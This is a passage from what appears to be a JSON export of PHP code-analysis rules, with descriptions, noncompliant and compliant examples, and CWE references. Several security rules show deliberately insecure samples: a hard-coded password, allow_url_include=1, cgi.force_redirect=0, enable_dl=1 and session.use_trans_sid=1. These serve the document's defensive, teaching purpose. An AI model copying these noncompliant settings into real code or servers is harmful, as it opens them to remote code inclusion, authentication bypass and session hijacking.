<\/tr>\n    <tr>\n      <td><code>spliti()<\/code><\/td>\n      <td><code>preg_split()<\/code> with 'i' modifier<\/td>\n    <\/tr>\n    <tr>\n      <td><code>sql_regcase()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>mysql_db_query()<\/code><\/td>\n      <td><code>mysql_select_db()<\/code> and <code>mysql_query()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>mysql_escape_string()<\/code><\/td>\n      <td><code>mysql_real_escape_string()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td>Passing locale category names as strings<\/td>\n      <td>Use the LC_* family of constants<\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2002","repo":"php","name":"Errors should not be silenced","htmlDesc":"<p>Just as pain is your body's way of telling you something is wrong, errors are PHP's way of telling you there's something you need to fix. Neither\npain, nor PHP errors should be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n@doSomethingDangerous($password);  \/\/ Noncompliant; '@' silences errors from function call\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomethingDangerous($password);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2003","repo":"php","name":"\"require_once\" and \"include_once\" should be used instead of \"require\" and \"include\"","htmlDesc":"<p>At root, <code>require<\/code>, <code>require_once<\/code>, <code>include<\/code>, and <code>include_once<\/code> all perform the same task of\nincluding one file in another. 
However, the way they perform that task differs, and they should not be used interchangeably.<\/p>\n<p><code>require<\/code> includes a file but generates a fatal error if an error occurs in the process.<\/p>\n<p><code>include<\/code> also includes a file, but generates only a warning if an error occurs.<\/p>\n<p>Predictably, the difference between <code>require<\/code> and <code>require_once<\/code> is the same as the difference between <code>include<\/code>\nand <code>include_once<\/code> - the \"_once\" versions ensure that the specified file is only included once. <\/p>\n<p>Because including the same file multiple times could have unpredictable results, the \"once\" versions are preferred.<\/p>\n<p>Because <code>include_once<\/code> generates only warnings, it should be used only when the file is being included conditionally, i.e. when all\npossible error conditions have been checked beforehand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ninclude 'code.php';  \/\/Noncompliant; not a \"_once\" usage and not conditional\ninclude $user.'_history.php'; \/\/ Noncompliant\nrequire 'more_code.php';  \/\/ Noncompliant; not a \"_once\" usage\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nrequire_once 'code.php';\nif (is_member($user)) {\n  include_once $user.'_history.php';\n}\nrequire_once 'more_code.php';\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2004","repo":"php","name":"Functions should not be nested too deeply","htmlDesc":"<p>Nesting functions can quickly turn your code into \"spaghetti code\". 
Such code is hard to read, refactor and therefore to maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction f () {\n  function f_inner () {\n    function f_inner_inner() {\n      function f_inner_inner_inner() { \/\/ Noncompliant\n      }\n    }\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S2005","repo":"php","name":"String literals should not be concatenated","htmlDesc":"<p>There is no reason to concatenate literal strings. Doing so is an exercise in reducing code readability. Instead, the strings should be\ncombined.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$msg = \"Hello \" . \"${name}\" . \"!\";  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$msg = \"Hello ${name}!\";\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2007","repo":"php","name":"Functions and variables should not be defined outside of classes","htmlDesc":"<p>Defining and using global variables and global functions, when the convention dictates OOP can be confusing and difficult to use properly for\nmultiple reasons:<\/p>\n<ul>\n  <li> You run the risk of name clashes. <\/li>\n  <li> Global functions must be stateless, or they can cause difficult-to-track bugs. <\/li>\n  <li> Global variables can be updated from anywhere and may no longer hold the value you expect. <\/li>\n  <li> It is difficult to properly test classes that use global functions. <\/li>\n<\/ul>\n<p>Instead of being declared globally, such variables and functions should be moved into a class, potentially marked <code>static<\/code>, so they can\nbe used without a class instance. 
<\/p>\n<p>This rule checks that only object-oriented programming is used and that no functions or procedures are declared outside of a class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n\n$name = \"Bob\"; \/\/ Noncompliant\n\nfunction doSomething($arg) {   \/\/ Noncompliant\n  \/\/...\n}\n\nclass MyClass {\n    \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\nclass MyClass {\n\n  public static $name = \"Bob\"; \/\/ Compliant\n\n  public static function doSomething($arg) {              \/\/ Compliant\n    \/\/...\n  }\n  \/\/...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2010","repo":"php","name":"\"&&\" and \"||\" should be used","htmlDesc":"<p>PHP has two sets of logical operators: <code>&amp;&amp;<\/code> \/ <code>||<\/code>, and <code>and<\/code> \/ <code>or<\/code>. The difference between\nthe sets is precedence. Because <code>and<\/code> \/ <code>or<\/code> have a lower precedence than almost any other operator, using them instead of\n<code>&amp;&amp;<\/code> \/ <code>||<\/code> may not have the result you expect.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time and $have_money;  \/\/ Noncompliant. $take_vacation == true.\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time &amp;&amp; $have_money;  \/\/ $take_vacation == false.\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2011","repo":"php","name":"\"global\" should not be used","htmlDesc":"<p>Global variables are a useful construct, but they should not be abused. Functions can access the global scope either through the\n<code>global<\/code> keyword or though the <code>$GLOBALS<\/code> array, but these practices considerably reduce the function's readability and\nreusability. 
Instead, the global variable should be passed as a parameter to the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myGlobalVariable;\n\nfunction foo()\n{\n  global $myGlobalVariable; \/\/ Noncompliant\n  $GLOBALS['myGlobalVariable']; \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo($myStateVariable)\n{\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2014","repo":"php","name":"\"$this\" should not be used in a static context","htmlDesc":"<p><code>$this<\/code> refers to the current class instance. But static methods can be accessed without instantiating the class, and <code>$this<\/code>\nis not available to them. Using <code>$this<\/code> in a static context will result in a fatal error at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Clazz {\n  public $name = NULL;  \/\/ instance variable\n\n  public static function foo(){\n    if ($this-&gt;name != NULL) {\n      \/\/ ...\n    }\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Clazz {\n  public $name = NULL;  \/\/ instance variable\n\n  public static function foo($nameParam){\n    if ($nameParam != NULL) {\n      \/\/ ...\n    }\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2036","repo":"php","name":"Files that define symbols should not cause side-effects","htmlDesc":"<p>Files that define symbols such as classes and variables may be included into many files. Simply performing that inclusion should have no effect on\nthose files other than declaring new symbols. For instance, a file containing a class definition should not also contain side-effects such as\n<code>print<\/code> statements that will be evaluated automatically on inclusion. Logic should be segregated into symbol-only files and\nside-effect-only files. 
The type of operation which is not allowed in a symbol-definition file includes but is not limited to: <\/p>\n<ul>\n  <li> generating output <\/li>\n  <li> modifying <code>ini<\/code> settings <\/li>\n  <li> emitting errors or exceptions <\/li>\n  <li> modifying global or static variables <\/li>\n  <li> reading\/writing files <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n\nprint \"Include worked!\";\n\nclass foo {\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n\nclass foo {\n\n  public function log() {\n    print \"Include worked!\";\n  }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/www.php-fig.org\/psr\/psr-1\/\">PHP-FIG Basic Coding Standard PSR1<\/a>, 2.3 - Side Effects <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2037","repo":"php","name":"Static members should be referenced with \"static::\"","htmlDesc":"<p>References in a class to static class members (fields or methods) can be made using either <code>self::$var<\/code> or <code>static::$var<\/code>\n(introduced in 5.3). The difference between the two is one of scope. Confusingly, in subclasses, the use of <code>self::<\/code> references the\noriginal definition of the member, i.e. the superclass version, rather than any override at the subclass level. 
<code>static::<\/code>, on the other\nhand, references the class that was called at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n\nclass Toy {\n\n    public static function status() {\n        self::getStatus();  \/\/ Noncompliant; will always print \"Sticks are fun!\" even when called from a subclass which overrides this method;\n    }\n\n    protected static function getStatus() {\n        echo \"Sticks are fun!\";\n    }\n}\n\nclass Ball extends Toy {\n\n    protected static function getStatus() {  \/\/ Doesn't actually get called\n        echo \"Balls are fun!\";\n    }\n}\n\n$myBall = new Ball();\n$myBall::status();  \/\/ Prints \"Sticks are fun!\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n\nclass Toy {\n\n    public static function status() {\n        static::getStatus();  \/\/ Compliant\n    }\n\n    protected static function getStatus() {\n        echo \"Sticks are fun!\";\n    }\n}\n\nclass Ball extends Toy {\n\n    protected static function getStatus() {\n        echo \"Balls are fun!\";\n    }\n}\n\n$myBall = new Ball();\n$myBall::status();  \/\/ Prints \"Balls are fun!\"\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>self<\/code> is used on a constant field, a private field or a private method.<\/p>\n<pre>\nclass A\n{\n    private static $somevar = \"hello\";\n    const CONSTANT = 42;\n\n    private static function foo()\n    {\n        $var = self::$somevar . self::CONSTANT;  \/\/ Should be OK\n        self::foo();                               \/\/ Should be OK\n    }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2038","repo":"php","name":"Colors should be defined in upper case","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. 
Writing colors in upper case makes them stand out as such, thereby making the\ncode easier to read.<\/p>\n<p>This rule checks that hexadecimal color definitions are written in upper case.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$white = '#ffffff';  \/\/ Noncompliant\n$dkgray = '#006400';\n$aqua = '#00ffff';  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$white = '#FFFFFF';  \/\/ Compliant\n$dkgray = '#006400';\n$aqua = '#00FFFF';  \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2041","repo":"php","name":"Parentheses should not be used for calls to \"echo\"","htmlDesc":"<p><code>echo<\/code> can be called with or without parentheses, but it is best practice to leave parentheses off the call because using parentheses\nwith multiple arguments will result in a parse error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho(\"Hello\");  \/\/ Noncompliant, but it works\necho(\"Hello\", \"World\"); \/\/ Noncompliant. Parse error\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho \"Hello\";\necho \"Hello\",\"World!\";\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2043","repo":"php","name":"Superglobals should not be accessed directly","htmlDesc":"<p>Superglobal variables are predefined variables available in all scopes throughout a script. However, accessing them directly is considered bad\npractice. 
Instead, they should be accessed through an object or framework that handles sanitation and validation.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$name = $_POST['name'];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$name = $this-&gt;params()-&gt;fromPost('name');\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2044","repo":"php","name":"\"php_sapi_name()\" should not be used","htmlDesc":"<p>Both <code>php_sapi_name()<\/code> and the <code>PHP_SAPI<\/code> constant give the same value. But calling the function is less efficient than simply\nreferencing the constant. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (php_sapi_name() == 'test') { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (PHP_SAPI == 'test') { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2046","repo":"php","name":"Perl-style comments should not be used","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule flags all Perl-style comments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myvar; # Noncompliant; this comment should have started with \"\/\/\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$myvar; \/\/ Compliant; this comment started with \"\/\/\"\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2047","repo":"php","name":"The names of methods with boolean return values should start with \"is\" or \"has\"","htmlDesc":"<p>Well-named functions can allow the users of your code to understand at a glance what to expect from the function - even before reading the\ndocumentation. 
Toward that end, methods returning a boolean property should have names that start with \"is\" or \"has\" rather than with \"get\".<\/p>\n<p>Note that this rule will only apply to functions that are documented to return a boolean.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function getFoo() \/\/ Noncompliant\n{\n  return foo;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function isFoo()\n{\n  return true;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2050","repo":"php","name":"Alias functions should not be used","htmlDesc":"<p>Certain functions exist in PHP only as aliases of other functions. These aliases have been made available for backward compatibility, but should\nreally be removed from code. <\/p>\n<p>This rule looks for uses of the following aliases:<\/p>\n<table>\n  <tbody>\n    <tr>\n      <th>Alias<\/th>\n      <th>Replacement<\/th>\n    <\/tr>\n    <tr>\n      <td><code>chop<\/code><\/td>\n      <td><code>rtrim<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>close<\/code><\/td>\n      <td><code>closedir<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>doubleval<\/code><\/td>\n      <td><code>floatval<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>fputs<\/code><\/td>\n      <td><code>fwrite<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>ini_alter<\/code><\/td>\n      <td><code>ini_set<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_double<\/code><\/td>\n      <td><code>is_float<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_integer<\/code><\/td>\n      <td><code>is_int<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_long<\/code><\/td>\n      <td><code>is_int<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_real<\/code><\/td>\n      <td><code>is_float<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_writeable<\/code><\/td>\n      
<td><code>is_writable<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>join<\/code><\/td>\n      <td><code>implode<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>key_exists<\/code><\/td>\n      <td><code>array_key_exists<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>magic_quotes_runtime<\/code><\/td>\n      <td><code>set_magic_quotes_runtime<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>pos<\/code><\/td>\n      <td><code>current<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>show_source<\/code><\/td>\n      <td><code>highlight_file<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>sizeof<\/code><\/td>\n      <td><code>count<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>strchr<\/code><\/td>\n      <td><code>strstr<\/code><\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho sizeof($arr);  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho count($arr);\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2068","repo":"php","name":"Credentials should not be hard-coded","htmlDesc":"<p>Because it is easy to extract strings from a compiled application, credentials should never be hard-coded. Do so, and they're almost guaranteed to\nend up in the hands of an attacker. 
This is particularly true for applications that are distributed.<\/p>\n<p>Credentials should be stored outside of the code in a strongly-protected encrypted configuration file or database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$uname = \"steve\";\n$password = \"blue\";\nconnect($uname, $password);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$uname = getEncryptedUser();\n$password = getEncryptedPass();\nconnect($uname, $password);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/798\">MITRE, CWE-798<\/a> - Use of Hard-coded Credentials <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/259\">MITRE, CWE-259<\/a> - Use of Hard-coded Password <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Porous Defenses <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/qQCHAQ\">CERT, MSC03-J.<\/a> - Never hard code sensitive information <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A2-Broken_Authentication_and_Session_Management\">OWASP Top Ten 2013 Category A2<\/a> -\n  Broken Authentication and Session Management <\/li>\n  <li> Derived from FindSecBugs rule <a href=\"http:\/\/h3xstream.github.io\/find-sec-bugs\/bugs.htm#HARD_CODE_PASSWORD\">Hard Coded Password<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S2260","repo":"php","name":"PHP parser failure","htmlDesc":"<p>When the PHP parser fails, it is possible to record the failure as a violation on the file. 
This way, not only is it possible to track the number\nof files that do not parse but also to easily find out why they do not parse.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2681","repo":"php","name":"Multiline blocks should be enclosed in curly braces","htmlDesc":"<p>Curly braces can be omitted from a one-line block, such as with an <code>if<\/code> statement or <code>for<\/code> loop, but doing so can be\nmisleading and induce bugs. <\/p>\n<p>This rule raises an issue when the indentation of the lines after a one-line block indicates an intent to include those lines in the block, but the\nomission of curly braces means the lines will be unconditionally executed once.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($condition)\n  firstActionInBlock();\n  secondAction();  \/\/ Noncompliant; executed unconditionally\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i &lt; count($array); $i++)\n  $str = $array[$i];\n  doTheThing($str);  \/\/ Noncompliant; executed only on last array element\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($condition) {\n  firstActionInBlock();\n  secondAction();\n}\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i &lt; count($array); $i++) {\n  $str = $array[$i];\n  doTheThing($str);\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/483.html\">MITRE, CWE-483<\/a> - Incorrect Block Delimitation <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n  <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2830","repo":"php","name":"Class constructors should not create other objects","htmlDesc":"<p>Dependency injection is a software design pattern in which one or more dependencies (or services) are injected, or passed by reference, into a\ndependent object (or client) 
and are made part of the client's state. The pattern separates the creation of a client's dependencies from its own\nbehavior, which allows program designs to be loosely coupled and to follow the dependency inversion and single responsibility principles.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass SomeClass {\n\n  public function __construct() {\n    $this-&gt;object = new SomeOtherClass();  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass SomeClass {\n\n  public function __construct(SomeOtherClass $object) {\n    $this-&gt;object = $object;\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S3332","repo":"php","name":"Session-management cookies should not be persistent","htmlDesc":"<p>Cookies without fixed lifetimes or expiration dates are known as non-persistent, or \"session\" cookies, meaning they last only as long as the\nbrowser session, and poof away when the browser closes. Cookies with expiration dates, \"persistent\" cookies, are stored\/persisted until those\ndates.<\/p>\n<p>Non-persistent cookies should be used for the management of logged-in sessions on web sites. 
To make a cookie non-persistent, simply omit the\n<code>expires<\/code> attribute.<\/p>\n<p>This rule raises an issue when <code>expires<\/code> is set for a session cookie, either programmatically or via configuration, such as\n<code>session.cookie_lifetime<\/code>.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n  (XSS) <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Session_Management_Cheat_Sheet#Expire_and_Max-Age_Attributes\">OWASP, Session Management Cheat\n  Sheet<\/a> - Expire and Max-Age Attributes <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3333","repo":"php","name":"\"open_basedir\" should limit file access","htmlDesc":"<p>The <code>open_basedir<\/code> configuration in <em>php.ini<\/em> limits the files the script can access using, for example, <code>include<\/code> and\n<code>fopen()<\/code>. Leave it out, and there is no default limit, meaning that any file can be accessed. Include it, and PHP will refuse to access\nfiles outside the allowed path.<\/p>\n<p><code>open_basedir<\/code> should be configured with a directory, which will then be accessible recursively. However, the use of <code>.<\/code>\n(current directory) as an <code>open_basedir<\/code> value should be avoided since it's resolved dynamically during script execution, so a\n<code>chdir('\/')<\/code> command could lay the whole server open to the script.<\/p>\n<p>This is not a fool-proof configuration; it can be reset or overridden at the script level. But its use should be seen as a minimum due diligence\nstep. 
This rule raises an issue when <code>open_basedir<\/code> is not present in <em>php.ini<\/em>, and when <code>open_basedir<\/code> contains root,\nor the current directory (<code>.<\/code>) symbol.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini try 1\n; open_basedir=\"${USER}\/scripts\/data\"  Noncompliant; commented out\n\n; php.ini try 2\nopen_basedir=\"\/:${USER}\/scripts\/data\"  ; Noncompliant; root directory in the list\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini try 1\nopen_basedir=\"${USER}\/scripts\/data\"\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3334","repo":"php","name":"\"allow_url_fopen\" and \"allow_url_include\" should be disabled","htmlDesc":"<p><code>allow_url_fopen<\/code> lets file functions such as <code>fopen()<\/code> and <code>file_get_contents()<\/code> read from URLs, and\n<code>allow_url_include<\/code> lets <code>include<\/code> and <code>require<\/code> pull code from URLs. The ability to suck in executable\ncode from outside your site, coupled with imperfect input cleansing could lay your site bare to attackers. 
Even if your input filtering is perfect\ntoday, are you prepared to bet your site that it will always be perfect in the future?<\/p>\n<p>This rule raises an issue when either property is explicitly enabled in <em>php.ini<\/em> and when <code>allow_url_fopen<\/code>, which defaults to\nenabled, is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini  Noncompliant; allow_url_fopen not explicitly disabled\nallow_url_include=1  ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nallow_url_fopen=0\nallow_url_include=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/829.html\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A1-Injection\">OWASP Top Ten 2013 Category A1<\/a> - Injection <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3335","repo":"php","name":"\"cgi.force_redirect\" should be enabled","htmlDesc":"<p>The <code>cgi.force_redirect<\/code> <em>php.ini<\/em> configuration is on by default, and it prevents unauthenticated access to scripts when PHP is\nrunning as a CGI. 
Unfortunately, it must be disabled on IIS, OmniHTTPD and Xitami, but in all other cases it should be on.<\/p>\n<p>This rule raises an issue when <code>cgi.force_redirect<\/code> is explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\ncgi.force_redirect=0  ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/305\">MITRE, CWE-305<\/a> - Authentication Bypass by Primary Weakness <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n  Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3336","repo":"php","name":"\"session.use_trans_sid\" should not be enabled","htmlDesc":"<p>PHP's <code>session.use_trans_sid<\/code> automatically appends the user's session id to URLs when cookies are disabled. On the face of it, this\nseems like a nice way to let uncookie-able users use your site anyway. In reality, it makes those users vulnerable to having their sessions hijacked\nby anyone who might:<\/p>\n<ul>\n  <li> see the URL over the user's shoulder <\/li>\n  <li> be sent the URL by the user <\/li>\n  <li> retrieve the URL from browser history <\/li>\n  <li> ... 
<\/li>\n<\/ul>\n<p>For that reason, it's better to practice a little \"tough love\" with your users and force them to turn on cookies.<\/p>\n<p>Since <code>session.use_trans_sid<\/code> is off by default, this rule raises an issue when it is explicitly enabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nsession.use_trans_sid=1  ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n  Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3337","repo":"php","name":"\"enable_dl\" should be disabled","htmlDesc":"<p><code>enable_dl<\/code> is on by default and allows <code>open_basedir<\/code> restrictions, which limit the files a script can access, to be\nignored. For that reason, it's a dangerous option and should be explicitly turned off.<\/p>\n<p>This rule raises an issue when <code>enable_dl<\/code> is not explicitly set to 0 in <em>php.ini<\/em>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nenable_dl=1  ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nenable_dl=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3338","repo":"php","name":"\"file_uploads\" should be disabled","htmlDesc":"<p><code>file_uploads<\/code> is an on-by-default PHP configuration that allows files to be uploaded to your site. 
